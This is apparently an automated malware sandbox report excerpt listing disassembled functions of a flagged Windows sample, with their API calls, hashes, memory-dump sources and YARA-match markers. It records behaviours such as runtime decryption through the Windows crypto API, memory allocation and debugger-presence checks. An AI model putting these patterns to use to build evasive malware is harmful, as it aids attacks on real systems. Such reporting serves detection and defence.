                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast_free
                                                              • String ID:
                                                              • API String ID: 1353095263-0
                                                              • Opcode ID: c45df409a2209a6dae7faf0f0439407c1fc408f0f17bd796a6383b085c05d1ef
                                                              • Instruction ID: 55f22833085c7284391f6abc04ff7850bc4061f265e97900bf2c914d8fb6d659
                                                              • Opcode Fuzzy Hash: c45df409a2209a6dae7faf0f0439407c1fc408f0f17bd796a6383b085c05d1ef
                                                              • Instruction Fuzzy Hash: CFC08C3110020CBBCB00DB42C806A8E7BA8DB80368F200048F40017240CAB1EE409694
                                                              Function 007AAE05 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007AAE56
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953574713.00000000007AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 007AA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7aa000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: 2fa29c7cb468a6ad3afcc210ed428314e6b96e5a785deadee78f6082c69949ad
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: 8E112B79A00208EFDB01DF98C985E99BBF5AF48351F058094F9489B362D375EA50DB80
                                                              Function 00402BE0 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00402BEF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 13b5f206aa341d0fbaeb0a1724a0e1e5cbc72d21563ec56196b404c9d5a1e8b3
                                                              • Instruction ID: 757219c421bd17c9bacb0b6147dd7d19cb6d4b5150cd33f247450a4ef3d9d6e3
                                                              • Opcode Fuzzy Hash: 13b5f206aa341d0fbaeb0a1724a0e1e5cbc72d21563ec56196b404c9d5a1e8b3
                                                              • Instruction Fuzzy Hash: B6C0483204420DFFCF025F81EC04C9E3F2AFB08260B448024FA1824030CB339931AB95
                                                              Function 00402C00 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualFree.KERNELBASE(?,?,?), ref: 00402C0C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FreeVirtual
                                                              • String ID:
                                                              • API String ID: 1263568516-0
                                                              • Opcode ID: 60f6fe46419e245ea3fe1cb545ffcffb3b8132432e166037cb3dc50b65685cfd
                                                              • Instruction ID: 453d66be5c1bbbae9c6a98f4a0570dcf14d6ac7d0ccfee59b5e1430b94dd3887
                                                              • Opcode Fuzzy Hash: 60f6fe46419e245ea3fe1cb545ffcffb3b8132432e166037cb3dc50b65685cfd
                                                              • Instruction Fuzzy Hash: 56B0923200020CFBCF021F81EC0489D3F2AFB08260B448024FA1C44031CB339571AB84

                                                              Non-executed Functions

                                                              Function 02173717 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 232encryptionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,00437018), ref: 02173797
                                                              • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 021737BB
                                                              • _mbstowcs.LIBCMT ref: 0217380E
                                                              • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 02173825
                                                              • GetLastError.KERNEL32 ref: 0217382F
                                                              • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 02173857
                                                              • GetLastError.KERNEL32 ref: 02173861
                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02173871
                                                              • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 02173933
                                                              • CryptDestroyKey.ADVAPI32(?), ref: 021739A5
                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 02173A25
                                                              Strings
                                                              • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 02173773, 02173A0A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease___std_exception_copy_mbstowcs
                                                              • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                              • API String ID: 4265767208-63410773
                                                              • Opcode ID: 9a155a2b7c47821049898c79bfb8f12405dbdff61417cc380cd6b9e646117a85
                                                              • Instruction ID: 02fef7121461014f27cd35132ff79c4b0e5f1d07c10f89f5b7faf8c97c00cb62
                                                              • Opcode Fuzzy Hash: 9a155a2b7c47821049898c79bfb8f12405dbdff61417cc380cd6b9e646117a85
                                                              • Instruction Fuzzy Hash: 5D819071B40218AFEB209F24CC45B9EBBB6FF85310F4081E9E94DE7281DB319A859F55
                                                              Function 021790C7 Relevance: 14.6, APIs: 5, Strings: 3, Instructions: 601COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0217924B
                                                              • __Init_thread_footer.LIBCMT ref: 021794E5
                                                              • __Init_thread_footer.LIBCMT ref: 02179331
                                                                • Part of subcall function 0217D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D333
                                                                • Part of subcall function 0217D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D366
                                                              • __Init_thread_footer.LIBCMT ref: 021796D6
                                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 021798A4
                                                                • Part of subcall function 0217D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D37E
                                                                • Part of subcall function 0217D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D3BB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$Init_thread_footer$EnterLeave$FileIos_base_dtorModuleNamestd::ios_base::_
                                                              • String ID: P:C$ZYA.$kc~z
                                                              • API String ID: 1348255701-279448249
                                                              • Opcode ID: 10e198ffe07126ebbc5d9e4083672b07ced8549812fe91e39b1e8414d8359049
                                                              • Instruction ID: a710e2f291c15ef4190545978f1f4b0f649085cb8ac869ad47bc92f2895a5690
                                                              • Opcode Fuzzy Hash: 10e198ffe07126ebbc5d9e4083672b07ced8549812fe91e39b1e8414d8359049
                                                              • Instruction Fuzzy Hash: 1442F5709402448FDB18DF28DC88BA9B7B1BF89314F1042EDE44997291DB75AF89CF85
                                                              Function 00420E93 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                              • GetACP.KERNEL32(?,?,?,?,?,?,00417A23,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00420F54
                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00417A23,?,?,?,00000055,?,-00000050,?,?), ref: 00420F7F
                                                              • _wcschr.LIBVCRUNTIME ref: 00421013
                                                              • _wcschr.LIBVCRUNTIME ref: 00421021
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004210E2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                              • String ID: utf8
                                                              • API String ID: 4147378913-905460609
                                                              • Opcode ID: ec97581227958269d26a21896a7a43edb4bdbbe001f50202358ae53c9e406f2b
                                                              • Instruction ID: bacd77ab9f109c2ce2fb904c5d91b5ba267ea5c699df71e4fc18565647c60fab
                                                              • Opcode Fuzzy Hash: ec97581227958269d26a21896a7a43edb4bdbbe001f50202358ae53c9e406f2b
                                                              • Instruction Fuzzy Hash: F4712831700321AAD734AB35EC86BBB73E8EF54704F55442BF505D7292EABCD8818668
                                                              Function 02191886 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,2000000B,02191BA4,00000002,00000000,?,?,?,02191BA4,?,00000000), ref: 0219191F
                                                              • GetLocaleInfoW.KERNEL32(00000000,20001004,02191BA4,00000002,00000000,?,?,?,02191BA4,?,00000000), ref: 02191948
                                                              • GetACP.KERNEL32(?,?,02191BA4,?,00000000), ref: 0219195D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: ACP$OCP
                                                              • API String ID: 2299586839-711371036
                                                              • Opcode ID: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                              • Instruction ID: 614a4a995eda094a6c51d8d1597f065400fc289731c955d7c8396c26ab68169a
                                                              • Opcode Fuzzy Hash: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                              • Instruction Fuzzy Hash: B9216032B8010BBEEF349F54D941B9B73A6AF44A64B968474E90ED7114E732DAC2C350
                                                              Function 0042161F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,2000000B,0042193D,00000002,00000000,?,?,?,0042193D,?,00000000), ref: 004216B8
                                                              • GetLocaleInfoW.KERNEL32(00000000,20001004,0042193D,00000002,00000000,?,?,?,0042193D,?,00000000), ref: 004216E1
                                                              • GetACP.KERNEL32(?,?,0042193D,?,00000000), ref: 004216F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: ACP$OCP
                                                              • API String ID: 2299586839-711371036
                                                              • Opcode ID: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                              • Instruction ID: 8acf744a58ce8a7ab2eb5bb327c39e73a43266cf4ebd95a2e37211785a4fc039
                                                              • Opcode Fuzzy Hash: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                              • Instruction Fuzzy Hash: ED219561700125A7D7348F54E901E9F73A6AF70B50FDE8466E806C7220E77ADD41C35C
                                                              Function 02191A5B Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                                • Part of subcall function 0218908A: _free.LIBCMT ref: 021890EC
                                                                • Part of subcall function 0218908A: _free.LIBCMT ref: 02189122
                                                              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 02191B67
                                                              • IsValidCodePage.KERNEL32(00000000), ref: 02191BB0
                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 02191BBF
                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 02191C07
                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 02191C26
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                              • String ID:
                                                              • API String ID: 949163717-0
                                                              • Opcode ID: 8a115925ad46f73fe3f85c246f00a00863f26e6dfe943abe63c1a752b08689ff
                                                              • Instruction ID: 29f092ede0eb71273f950f196e423d9416f98789fed153cf7b15a2e4d96c0389
                                                              • Opcode Fuzzy Hash: 8a115925ad46f73fe3f85c246f00a00863f26e6dfe943abe63c1a752b08689ff
                                                              • Instruction Fuzzy Hash: 49517671A4020ABFDF24DFA9CC80ABE77BAEF44704F584469E919E7190E7709981CF61
                                                              Function 004217F4 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                                • Part of subcall function 00418E23: _free.LIBCMT ref: 00418E85
                                                                • Part of subcall function 00418E23: _free.LIBCMT ref: 00418EBB
                                                              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00421900
                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00421949
                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00421958
                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 004219A0
                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004219BF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                              • String ID:
                                                              • API String ID: 949163717-0
                                                              • Opcode ID: 58ecbf3c41238f0300b8562ce6723dacb10c2e4b0d6c54bc6f80534ba04a49f5
                                                              • Instruction ID: 516db4477a6e51dbe21ee2870d246937693e17751cc1d143beebadadd3fc4239
                                                              • Opcode Fuzzy Hash: 58ecbf3c41238f0300b8562ce6723dacb10c2e4b0d6c54bc6f80534ba04a49f5
                                                              • Instruction Fuzzy Hash: BC51A971B00229ABEF20EFA5DC81ABF73B8BF54704F94446AF500E7260D7749945C769
                                                              Function 00415900 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 450COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .AB$.AB
                                                              • API String ID: 0-2297053732
                                                              • Opcode ID: 34d1119f2ae738b9659adfb13489a30e3bb955bef0d933f4a1bcf5af706cb53a
                                                              • Instruction ID: 9c6ffa21bb75b4405fc2a4b8468ed771a2dab9a861c59683d1b669e683ffb55f
                                                              • Opcode Fuzzy Hash: 34d1119f2ae738b9659adfb13489a30e3bb955bef0d933f4a1bcf5af706cb53a
                                                              • Instruction Fuzzy Hash: DAF13D71E00619DFDF14CFA9D9806EEB7B1FF88314F15826AD819AB344E734A941CB94
                                                              Function 0217DA1C Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0217DA28
                                                              • IsDebuggerPresent.KERNEL32 ref: 0217DAF4
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0217DB14
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0217DB1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 2768bc1d968ea917b1f97be8d9738c8842834bd5cce99c898dd5a0b2e51368ae
                                                              • Instruction ID: ca1a4268828022b3b297444aab82f7db7d8d9f4918f29e5e6ecf305713cdf927
                                                              • Opcode Fuzzy Hash: 2768bc1d968ea917b1f97be8d9738c8842834bd5cce99c898dd5a0b2e51368ae
                                                              • Instruction Fuzzy Hash: 1631F875D4621CDBDB21DFA4DD89BCCBBB8BF48304F1041AAE40DAB290EB715A859F05
                                                              Function 0040D7B5 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040D7C1
                                                              • IsDebuggerPresent.KERNEL32 ref: 0040D88D
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D8AD
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0040D8B7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 2768bc1d968ea917b1f97be8d9738c8842834bd5cce99c898dd5a0b2e51368ae
                                                              • Instruction ID: d4761c8bc1ea99229fdb17dfe79701451352590760d76ee157224913cadfbb7a
                                                              • Opcode Fuzzy Hash: 2768bc1d968ea917b1f97be8d9738c8842834bd5cce99c898dd5a0b2e51368ae
                                                              • Instruction Fuzzy Hash: 0E312F75D0521CDBDB20EFA5DD897CDBBB8BF08304F1040AAE40DA7290EB745A898F49
                                                              Function 0219150D Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                                • Part of subcall function 0218908A: _free.LIBCMT ref: 021890EC
                                                                • Part of subcall function 0218908A: _free.LIBCMT ref: 02189122
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02191561
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 021915AB
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02191671
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale$ErrorLast_free
                                                              • String ID:
                                                              • API String ID: 3140898709-0
                                                              • Opcode ID: c5c1a4c01b29c0d3fe338de7955a3c3bd7360db9fe1c38947b5196717d1a821e
                                                              • Instruction ID: 81efe611d5dc530d73851392f57e738bae50e4b9348aa356da9a87cb74b96710
                                                              • Opcode Fuzzy Hash: c5c1a4c01b29c0d3fe338de7955a3c3bd7360db9fe1c38947b5196717d1a821e
                                                              • Instruction Fuzzy Hash: 8A619172A90107AFDF289F28CD82BBA77A9EF04704F144179E919C6584EB75D9C1CF90
                                                              Function 004212A6 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                                • Part of subcall function 00418E23: _free.LIBCMT ref: 00418E85
                                                                • Part of subcall function 00418E23: _free.LIBCMT ref: 00418EBB
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004212FA
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00421344
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042140A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale$ErrorLast_free
                                                              • String ID:
                                                              • API String ID: 3140898709-0
                                                              • Opcode ID: 6acd00e9d4d0afc85601edb706b6c7d2d676f6c1e07a3845ab24e45734ca9780
                                                              • Instruction ID: c0bfd8cb71a0601470ff8ebcabc1dd41d73bf956737fdebdb9191936bb842b31
                                                              • Opcode Fuzzy Hash: 6acd00e9d4d0afc85601edb706b6c7d2d676f6c1e07a3845ab24e45734ca9780
                                                              • Instruction Fuzzy Hash: AE61A2716002279BEB24EF25DC82BBA73A9EF24304F54407BED05C6691E778D981CB58
                                                              Function 021813E2 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 021814DA
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 021814E4
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 021814F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: d251c0be41ef698f786db62af69caaf638685dfa11e06260af1d2b118d267355
                                                              • Instruction ID: 35f34d5b67cf3020019f2da38daf0befdfd8d7fffd34c9dfa440a698f7ec9b6e
                                                              • Opcode Fuzzy Hash: d251c0be41ef698f786db62af69caaf638685dfa11e06260af1d2b118d267355
                                                              • Instruction Fuzzy Hash: 8131D87594122CABCB21DF64DD89B9DBBF4BF48310F5041EAE41CA7290EB709B858F44
                                                              Function 0041117B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00411273
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0041127D
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0041128A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: 2c1a32ef1035b5dbf8a491830e48d39a1b8ac0405532fc47cee9a52cbebb52c5
                                                              • Instruction ID: 069db0b729b88edcbe1415199c877a2f5388b532d604f6458ec580dce293a37e
                                                              • Opcode Fuzzy Hash: 2c1a32ef1035b5dbf8a491830e48d39a1b8ac0405532fc47cee9a52cbebb52c5
                                                              • Instruction Fuzzy Hash: E331D674D012289BCB21DF65DC897DDBBB4BF08714F5041EAE50CA62A0E7349B858F49
                                                              Function 02184EF6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,02184EF5,00000000,004280A0,?,00000000,?,0218933A), ref: 02184F18
                                                              • TerminateProcess.KERNEL32(00000000,?,02184EF5,00000000,004280A0,?,00000000,?,0218933A), ref: 02184F1F
                                                              • ExitProcess.KERNEL32 ref: 02184F31
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 5d3814fd653fb94eda293752331a35f9eef9a20fec4b4b7a3dbf7aca3d0aeaad
                                                              • Instruction ID: c9a3f25b52eb6bc75d85df6a2d6c77e27b5efa697b35070df000a7c6c08a8b87
                                                              • Opcode Fuzzy Hash: 5d3814fd653fb94eda293752331a35f9eef9a20fec4b4b7a3dbf7aca3d0aeaad
                                                              • Instruction Fuzzy Hash: EEE0B631185118AFCF217F68DC88A6D7B69EB44292B80442CF80586171CF35D993CE44
                                                              Function 10005F25 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                                              • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                                              • ExitProcess.KERNEL32 ref: 10005F60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
